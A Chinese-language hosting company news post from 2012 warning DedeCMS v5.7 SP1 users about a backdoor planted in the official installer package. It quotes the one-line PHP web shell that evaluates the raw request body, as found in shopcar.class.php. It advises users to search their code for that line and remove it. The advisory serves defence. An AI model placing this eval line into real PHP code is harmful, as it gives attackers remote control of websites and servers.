新闻中心

无忧主机dedecms用户注意:新爆dedecms织梦内容管理系统后门

作者 / 时间 2012-03-25 19:59:33

无忧主机(www.51php.com)今天在阅读业内新闻,看到一则最新关于dedecms内容管理系统被植入后门的代码,非常危险,这个后台将有可能泄漏网站资料或被控制对外攻击,对用户网站威胁巨大。详细信息如下: 3月22 日消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)v5.7 sp1 版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,进而上传攻击脚本,利用用户网站对外发动攻击,并能够控制用户的网站进而对服务器安全和稳定造成威胁。 安全界人士分析发现,此次织梦CMS 曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval (file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门,严重威胁服务器的安全和稳定,进而控制用户网站渔利或进行其它非法行为。 无忧主机(www.51php.com)在使用dedecms系统的用户密切关注dedecms官方动向,如有更新补丁请及时升级更新。无忧主机建议用户把dedecms的站点源代码下载到本地,利用文本替换器,查找搜索“@eval(file_get_contents ('php://input'));” 判断自己的代码中是否存在这个后门代码,如果有请及时删除。 相关链接: 织梦CMS系统被曝植入后门70万网站资料或泄露 无忧主机(www.51php.com)提醒用户,请及时检查并做好dedecms v5.7 sp1升级防御工作。凡发现,此漏洞给服务器带来严重安全问题的,我公司为保障服务器用户网站安全为由,dedecms v5.7 sp1存在严重安全漏洞为由关停站点,直至该漏洞被修复。 纯Linux环境下高端免备案[香港独立IP地址] php空间,仅仅只需199元一年起。商务中国域名核心代理直销50元注册国际顶级域名

本文地址:https://www.51php.com/dedecms/5411.html

1
1
1
1
1
1
1